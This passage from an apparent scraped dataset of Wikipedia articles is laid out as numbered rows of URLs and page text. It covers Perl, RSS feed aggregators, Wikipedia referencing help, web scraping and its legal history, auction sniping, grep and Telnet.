the more complex, but flexible, XS mechanism. 125 Perl has many and varied applications, compounded by the availability of many standard and third-party modules. Perl has chiefly been used to write CGI scripts: large projects written in Perl include cPanel, Slash, Bugzilla, RT, TWiki, and Movable Type; high-traffic websites that use Perl extensively include Priceline.com, Craigslist, 126 IMDb, 127 LiveJournal, DuckDuckGo, 128 129 Slashdot and Ticketmaster. It is also an optional component of the popular LAMP technology stack for Web development, in lieu of PHP or Python. Perl is used extensively as a system programming language in the Debian Linux distribution. 130 Perl is often used as a glue language, tying together systems and interfaces that were not specifically designed to interoperate, and for "data munging", 131 that is, converting or processing large amounts of data for tasks such as creating reports. These strengths are linked intimately. The combination makes Perl a popular all-purpose language for system administrators, particularly because short programs, often called "one-liner programs", can be entered and run on a single command line. citation needed Perl code can be made portable across Windows and Unix; such code is often used by suppliers of software (both commercial off-the-shelf (COTS) and bespoke) to simplify packaging and maintenance of software build- and deployment-scripts. citation needed Perl Tk and wxPerl are commonly used to add graphical user interfaces to Perl scripts. Perl's text-handling capabilities can be used for generating SQL queries; arrays, hashes, and automatic memory management make it easy to collect and process the returned data. For example, in Tim Bunce's Perl DBI application programming interface (API), the arguments to the API can be the text of SQL queries; thus it is possible to program in multiple languages at the same time (e.g., for generating a Web page using HTML, JavaScript, and SQL in a here document). The use of Perl variable interpolation to programmatically customize each of the SQL queries, and the specification of Perl arrays or hashes as the structures to programmatically hold the resulting data sets from each SQL query, allows a high-level mechanism for handling large amounts of data for post-processing by a Perl subprogram. 132 In early versions of Perl, database interfaces were created by relinking the interpreter with a client-side database library. This was sufficiently difficult that it was done for only a few of the most-important and most widely used databases, and it restricted the resulting perl executable to using just one database interface at a time. 133 In Perl 5, database interfaces are implemented by Perl DBI modules. The DBI (Database Interface) module presents a single, database-independent interface to Perl applications, while the DBD (Database Driver) modules handle the details of accessing some 50 different databases; there are DBD drivers for most ANSI SQL databases. 134 DBI provides caching for database handles and queries, which can greatly improve performance in long-lived execution environments such as mod perl, 135 helping high-volume systems avert load spikes as in the Slashdot effect. 136 In modern Perl applications, especially those written using web frameworks such as Catalyst, the DBI module is often used indirectly via object-relational mappers such as DBIx::Class, Class::DBI 137 or Rose::DB::Object 138 that generate SQL queries and handle data transparently to the application author. 139 Perl's culture and community has developed alongside the language itself. Usenet was the first public venue in which Perl was introduced, but over the course of its evolution, Perl's community was shaped by the growth of broadening Internet-based services including the introduction of the World Wide Web. The community that surrounds Perl was, in fact, the topic of Wall's first "State of the Onion" talk. 140 State of the Onion is the name for Wall's yearly keynote-style summaries on the progress of Perl and its community. They are characterized by his hallmark humor, employing references to Perl's culture, the wider hacker culture, Wall's linguistic background, sometimes his family life, and occasionally even his Christian background. 141 Each talk is first given at various Perl conferences and is eventually also published online. In email, Usenet, and message board postings, "Just another Perl hacker" (JAPH) programs are a common trend, originated by Randal L. Schwartz, one of the earliest professional Perl trainers. 142 In the parlance of Perl culture, Perl programmers are known as Perl hackers, and from this derives the practice of writing short programs to print out the phrase "Just another Perl hacker". In the spirit of the original concept, these programs are moderately obfuscated and short enough to fit into the signature of an email or Usenet message. The "canonical" JAPH as developed by Schwartz includes the comma at the end, although this is often omitted. 143 Perl "golf" is the pastime of reducing the number of characters (key "strokes") used in a Perl program to the bare minimum, much in the same way that golf players seek to take as few shots as possible in a round. The phrase's first use 144 emphasized the difference between pedestrian code meant to teach a newcomer and terse hacks likely to amuse experienced Perl programmers, an example of the latter being JAPHs that were already used in signatures in Usenet postings and elsewhere. Similar stunts had been an unnamed pastime in the language APL in previous decades. The use of Perl to write a program that performed RSA encryption prompted a widespread and practical interest in this pastime. 145 In subsequent years, the term "code golf" has been applied to the pastime in other languages. 146 A Perl Golf Apocalypse was held at Perl Conference 4.0 in Monterey, California in July 2000. As with C, obfuscated code competitions were a well known pastime in the late 1990s. The Obfuscated Perl Contest was a competition held by The Perl Journal from 1996 to 2000 that made an arch virtue of Perl's syntactic flexibility. Awards were given for categories such as "most powerful"—programs that made efficient use of space—and "best four-line signature" for programs that fit into four lines of 76 characters in the style of a Usenet signature block. 147 Perl poetry is the practice of writing poems that can be compiled as legal Perl code, for example the piece known as "Black Perl". Perl poetry is made possible by the large number of English words that are used in the Perl language. New poems are regularly submitted to the community at PerlMonks. 148 |
183 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators | The following is a comparison of RSS feed aggregators. Often e-mail programs and web browsers have the ability to display RSS feeds. They are listed here, too. Many BitTorrent clients support RSS feeds for broadcasting (see Comparison of BitTorrent clients). With the rise of cloud computing, some cloud based services offer feed aggregation. They are listed here as well. 6.5.6 (May 13, 2024; 3 months ago (2024 05 13) 53 ) 4.8.6 (May 13, 2024; 3 months ago (2024 05 13) 54 ) 4.7.9 (March 2, 2021; 3 years ago (2021 03 02) 55 ) 4.14.3 (May 30, 2024; 2 months ago (2024 05 30) 56 ) 3.7.6 (May 28, 2024; 2 months ago (2024 05 28) 57 ) Netscape Messenger 9 is a fork of Mozilla Thunderbird and has the same features. Web browsers and Internet suites have for browser plugin a N A, because they don't need it. |
184 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Referencing_for_beginners | One of the key policies of Wikipedia is that all article content has to be verifiable. This means that reliable sources must be able to support the material. All quotations, any material whose verifiability has been challenged or is likely to be challenged, and contentious material (whether negative, positive, or neutral) about living persons must include an inline citation to a source that directly supports the material. This also means that Wikipedia is not the place for original work, archival findings that have not been published, or evidence from any source that has not been published. If you are adding new content, it is your responsibility to add sourcing information along with it. Material provided without a source is significantly more likely to be removed from an article. Sometimes it will be tagged first with a "citation needed" template to give editors a chance to find and add sources, but some editors will simply remove it because they question its veracity. This tutorial will show you how to add inline citations to articles, and also briefly explain what Wikipedia considers to be a reliable source. Inline citations are usually small, numbered footnotes like this. 1 They are generally added either directly following the fact that they support, or at the end of the sentence that they support, following any punctuation. When clicked, they take the reader to a citation in a reference section near the bottom of the article. While editing a page that uses the most common footnote style, you will see inline citations displayed between ref ... ref tags. If you are creating a new page, or adding references to a page that didn't previously have any, remember to add a References section like the one below near the end of the article: Note: This is by far the most popular system for inline citations, but sometimes you will find other styles being used in an article. This is acceptable, and you shouldn't change it or mix styles. To add a new reference, just copy and modify an existing one. Manually adding references can be a slow and tricky process. Fortunately, there is a tool called "RefToolbar" built into the Wikipedia edit window, which makes it much easier. To use it, click on Cite at the top of the edit window, having already positioned your cursor after the sentence or fact you wish to reference. Then select one of the 'Templates' from the dropdown menu that best suits the type of source. These are: A template window then pops up, where you fill in as much information as possible about the source, and give a unique name for it in the "Ref name" field. Click the "Insert" button, which will add the required wikitext in the edit window. If you wish, you can also "Preview" how your reference will look first. Some fields (such as a web address, also known as a URL) will have a icon next to them. After filling in this field, you can click it to handily autofill the remaining fields. It doesn't always work properly, though, so be sure to double check it. Often, you will want to use the same source more than once in an article to support multiple facts. In this case, you can click Named references in the toolbar, and select a previously added source to re-use. As an alternative to the RefToolbar, it is possible to insert citations in the source editor using a similar automated tool as the one used in the visual editor. For this, you need to enable the 2017 wikitext editor in your preferences. You will then be able to edit the source of pages while inserting citations using the automated tool of the visual editor. Wikipedia articles require reliable, published sources that directly support the information presented in the article. Now you know how to add sources to an article, but which sources should you use? The word "source" in Wikipedia has three meanings: the work itself (for example, a document, article, paper, or book), the creator of the work (for example, the writer), and the publisher of the work (for example, Cambridge University Press). All three can affect reliability. Reliable sources are those with a reputation for fact-checking and accuracy. They tend to have an editorial process with multiple people scrutinizing work before it is published. Academic and peer-reviewed publications are usually the most reliable sources. Other reliable sources include university textbooks, books published by respected publishing houses, magazines, journals, and news coverage (not opinions) from mainstream newspapers. Self-published media, where the author and publisher are the same, are usually not acceptable as sources. These can include newsletters, personal websites, press releases, patents, open wikis, personal or group blogs, and tweets. However, if an author is an established expert with a previous record of third-party publications on a topic, their self-published work may be considered reliable for that particular topic. Whether a source is usable also depends on context. Sources that are reliable for some material are not reliable for other material. For instance, otherwise unreliable self-published sources are usually acceptable to support uncontroversial information about the source's author. You should always try to use the best possible source, particularly when writing about living people. These are general guidelines, but the topic of reliable sources is a complicated one, and is impossible to fully cover here. You can find more information at Wikipedia:Verifiability and at Wikipedia:Reliable sources. There is also a list of commonly used sources with information on their reliability. Try it Take a quiz on reliable sources |
185 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:WhatLinksHere/Data_scraping | The following pages link to Data scraping Showing 50 items. |
186 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-8 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
187 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Auction_sniping | Auction sniping (also called bid sniping) is the practice, in a timed online auction, of placing a bid likely to exceed the current highest bid (which may be hidden) as late as possible—usually seconds before the end of the auction—giving other bidders no time to outbid the sniper. This can be done either manually or by software on the bidder's computer, 1 or by an online sniping service. 2 3 A bid sniper (often, merely called a sniper) is a person, or software agent, that performs auction sniping. Online services claim that their use decreases the failure rate of the snipe, because they have more reliable servers and a faster Internet connection with less variation in latency, allowing the bid to more reliably be placed close to the deadline. Experienced bidders on online auctions with fixed ending-times often prefer entering bids late in the auction 4 to avoid bidding wars (multiple rounds of bidders each increasing their maximum bid to temporarily regain "current highest bid" status) 2 or bid chasing (where the presence of an existing bid encourages others to bid on the same item). One economic analysis of sniping suggests that sniping is a rational gain-maximizing (in other words, price-minimizing) strategy for bidders in auctions that fulfill two criteria: For example, a novice antiques buyer may prefer to bid in auctions which already have bids placed by more experienced antiques buyers, on the grounds that the items which the experienced buyers are interested in are more likely to be valuable. In this case, more-informed buyers may delay bidding until the last minutes of the auction to avoid creating competition for their bids, leading to a lower winning bid. An analysis of actual winning bids on eBay suggests that winning bidders are more likely to have placed a single bid late in the auction, rather than to have placed multiple incremental bids as the auction progresses. 6 Many online auctions use proxy bidding, an iterative sealed bid auction where winners pay a fixed increment over the second highest bid. The auctioneer does not disclose the current maximum bid, but the second highest bid is always public. In proxy bidding, the wise bidder must know in advance the "true" value of an item as a basis for their secret bidding limit. 2 The fact that the maximum bid is revealed when it is outbid introduces the possibility of maximum bid fishing. Bidders unsure of the value of an item may incrementally increase their bid until they narrowly exceed the previously hidden maximum, thus placing themselves in a winning position without placing a very high bid. Sniping eliminates this possibility and effectively converts the auction to a Vickrey auction, the same as a proxy bidding auction except that all bids are kept secret until the close of bidding. Sniping closes a loophole to fraudulent practice by a shill (an agent for the seller, which may be another account of the seller) to raise the bid to the maximum. They then hope the original bidder will increase their maximum bid even by a small amount to win the auction. The danger to the seller in this case is that the original bidder may not choose to increase their bid, leaving the seller with a futile transaction (selling the item to themselves) which will often still incur a fee from the auction service. Bidding at the last moment prevents a shill bidder from pushing the auction higher, as they have no time to make the incremental bids required. Bid sniping can be used when many similar items are available at auction simultaneously, with various ending times, and a bidder only wishes to win one item. Automated bid sniping tools allow for an efficient way to bid on multiple items, up to the maximum price the bidder wishes to pay, without bidding on the actual auction platform itself and potentially winning more than one of the auctions. Once the bidder wins the desired item, they can cancel the other scheduled snipe bids before they are actually placed in the auction system itself. This is not a factor if the auction platform allows bidders to instantly withdraw their bids without reason, but many do not. Increasing the number of similar or identical items bid on, reduces the attachment to winning any one of them. The ability to batch a queue of snipe bids for auctions long in advance and waiting for notification of the win without further management allows for a more efficient use of time. Non-sniping bidders may object to sniping, claiming that it is unfair to place bids at a point when it is impossible or unfeasible for other bidders to evaluate and possibly counter the bid, causing them to lose auctions even though they would have been willing to meet the winning bid amount. Bidders sometimes object to sniping when multiple identical items are listed as a separate lot, or on breakup auctions, where items that constitute a set are broken down and sold separately, as they must wait to find whether their maximum bid on one lot has been exceeded before being in a position to decide whether to bid on another. citation needed However, online auction sites, unlike live auctions, usually have an automatic bidding system which allows a bidder to enter their maximum acceptable bid. This is a hidden or proxy bid, known to the system, but not any other bidders; during the auction the actual bid is incremented only enough to beat the existing highest bid. For example, if an item's current maximum high bid is 57 and someone is prepared to pay 100 and bids accordingly, the displayed bid will be 58, with the hidden maximum of 100. 7 The failure of a maximum acceptable bid beaten by a sniper prepared to pay more is not due to the act of sniping, unless the original bidder would have bid higher on seeing their bid exceeded. For this reason, opposition to sniping can be analyzed as more of a subjective reaction to losing an auction for the usual reason of not bidding enough, than a reaction to a "dirty trick". 8 The beaten bidder would have beaten the sniper if their maximum bid had been more than the sniper was willing to offer. However, if the minimum bid increment is very low, the sorites paradox can come into play, and make it difficult for a person to establish a single maximum bid. 9 For example, if the minimum bid increment on an auction is 10 cents, it can be difficult or impossible for a person to identify a price which they would be willing to pay to win the item but which they would not be willing to exceed by ten cents. original research? While some people disapprove of auction sniping, it is not forbidden by the rules of many auction sites. For example, it is permitted by eBay. eBay Germany banned automated sniping services in 2002, 10 but the ban was declared illegal by Berlin's County Court, and revoked. 11 One attempt to defeat automated bid sniping software is requiring bidders to pass a CAPTCHA test prior to entering their bid. This ensures that all bids are entered manually. Some software can read some CAPTCHAs, potentially neutralising the protection. Also known simply as "anti-snipe". Some online auction systems attempt to discourage sniping (manual or automated) by automatically extending the auction time if a last-minute bid is placed. This approach leaves all bidding open, and allows any bidders who are watching during the final few minutes to raise the bid. It can also lead to last-minute automated out-of-control bidding wars between bidders, which can extend the bidding time long beyond what the seller desired, greatly raising the final selling price. Any site which implements a limit to the number of time extensions allowed simply causes a final extension snipe. Some auction systems allow buyers to end an auction early by paying a predetermined final price for the item (generally substantially more than the minimum opening bid). This may discourage some sniping because another bidder can simply purchase the item outright while the sniper is waiting for the auction end time, even if a successful snipe bid could win it for substantially less than the Buy It Now price. On eBay the Buy It Now (BIN) option is not intended to deter sniping, and is removed as soon as a bid (exceeding a reserve price, if set) is made. A bidder intending to snipe can eliminate the Buy It Now option by making the lowest acceptable bid early in the auction. The practice of buying newly listed Buy It Now items offered at an attractively low price is sometimes called "BIN sniping", 12 though unrelated to last-minute sniping. BIN sniping cannot be automated; the sniper must check items as soon they are listed, and buy before anyone else. |
188 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Grep | grep is a command-line utility for searching plaintext datasets for lines that match a regular expression. Its name comes from the ed command g re p (global regular expression search and print), which has the same effect. 3 4 grep was originally developed for the Unix operating system, but later available for all Unix-like systems and some others such as OS 9. 5 Before it was named, grep was a private utility written by Ken Thompson to search files for certain patterns. Doug McIlroy, unaware of its existence, asked Thompson to write such a program. Responding that he would think about such a utility overnight, Thompson actually corrected bugs and made improvements for about an hour on his own program called s (short for "search"). The next day he presented the program to McIlroy, who said it was exactly what he wanted. Thompson's account may explain the belief that grep was written overnight. 6 Thompson wrote the first version in PDP 11 assembly language to help Lee E. McMahon analyze the text of The Federalist Papers to determine authorship of the individual papers. 7 The ed text editor (also authored by Thompson) had regular expression support but could not be used to search through such a large amount of text, as it loaded the entire file into memory to enable random access editing, so Thompson excerpted that regexp code into a standalone tool which would instead process arbitrarily long files sequentially without buffering too much into memory. 1 He chose the name because in ed, the command g re p would print all lines featuring a specified pattern match. 8 9 grep was first included in Version 4 Unix. Stating that it is "generally cited as the prototypical software tool", McIlroy credited grep with "irrevocably ingraining" Thompson's tools philosophy in Unix. 10 A variety of grep implementations are available in many operating systems and software development environments. 11 Early variants included egrep and fgrep, introduced in Version 7 Unix. 10 The "egrep" variant supports an extended regular expression syntax added by Alfred Aho after Ken Thompson's original regular expression implementation. 12 The "fgrep" variant searches for any of a list of fixed strings using the Aho Corasick string matching algorithm. 13 Binaries of these variants exist in modern systems, usually linking to grep or calling grep as a shell script with the appropriate flag added, e.g. exec grep -E . egrep and fgrep, while commonly deployed on POSIX systems, to the point the POSIX specification mentions their widespread existence, are actually not part of POSIX. 14 Other commands contain the word "grep" to indicate they are search tools, typically ones that rely on regular expression matches. The pgrep utility, for instance, displays the processes whose names match a given regular expression. 15 In the Perl programming language, grep is the name of the built-in function that finds elements in a list that satisfy a certain property. 16 This higher-order function is typically named filter or where in other languages. The pcregrep command is an implementation of grep that uses Perl regular expression syntax. 17 Similar functionality can be invoked in the GNU version of grep with the -P flag. 18 Ports of grep (within Cygwin and GnuWin32, for example) also run under Microsoft Windows. Some versions of Windows feature the similar qgrep or findstr command. 19 A grep command is also part of ASCII's MSX-DOS2 Tools for MSX-DOS version 2. 20 The grep, egrep, and fgrep commands have also been ported to the IBM i operating system. 21 The software Adobe InDesign has functions GREP (since CS3 version (2007) 22 ), in the find change dialog box 23 "GREP" tab, and introduced with InDesign CS4 24 in paragraph styles 25 "GREP styles". agrep (approximate grep) matches even when the text only approximately fits the search pattern. 26 This following invocation finds netmasks in file myfile, but also any other word that can be derived from it, given no more than two substitutions. This example generates a list of matches with the closest, that is those with the fewest, substitutions listed first. The command flag B means best: In December 2003, the Oxford English Dictionary Online added "grep" as both a noun and a verb. 27 A common verb usage is the phrase "You can't grep dead trees"—meaning one can more easily search through digital media, using tools such as grep, than one could with a hard copy (i.e. one made from "dead trees", which in this context is a dysphemism for paper). 28 |
189 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Telnet | Telnet (short for "teletype network") 1 2 is a client server application protocol that provides access to virtual terminals of remote systems on local area networks or the Internet. 3 It is a protocol for bidirectional 8 bit communications. Its main goal was to connect terminal devices and terminal-oriented processes. 4 Telnet consists of two components: (1) the protocol itself which specifies how two parties are to communicate and (2) the software application that provides the service. User data is interspersed in-band with Telnet control information in an 8 bit byte oriented data connection over the Transmission Control Protocol (TCP). Telnet was developed as secret technology in 1969 beginning with RFC 15, extended in RFC 855, and standardized as Internet Engineering Task Force (IETF) Internet Standard STD 8, one of the first Internet standards. 1 2 Telnet transmits all information including usernames and passwords in plaintext so it is not recommended for security-sensitive applications such as remote management of routers. 3 5 Telnet's use for this purpose has waned significantly in favor of SSH. 6 Some extensions to Telnet which would provide encryption have been proposed. 7 Telnet consists of two components: (1) the protocol itself and (2) the service component. The telnet protocol is a client-server protocol, based on a reliable connection-oriented transport. 3 This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23 or 2323, where a Telnet server application is listening. 4 8 9 The Telnet protocol abstracts any terminal as a Network Virtual Terminal (NVT). The client must simulate a NVT using the NVT codes when messaging the server. Telnet predated UDP IP and originally ran over Network Control Protocol (NCP). 10 The telnet service is best understood in the context of a user with a simple terminal using the local Telnet program (known as the client program) to run a logon session on a remote computer where the user's communications needs are handled by a Telnet server program. Even though Telnet was an ad hoc protocol with no official definition until March 5, 1973, 11 the name actually referred to Teletype Over Network Protocol as the RFC 206 (NIC 7176) on Telnet makes the connection clear: 12 The TELNET protocol is based upon the notion of a virtual teletype, employing a 7 bit ASCII character set. The primary function of a User TELNET, then, is to provide the means by which 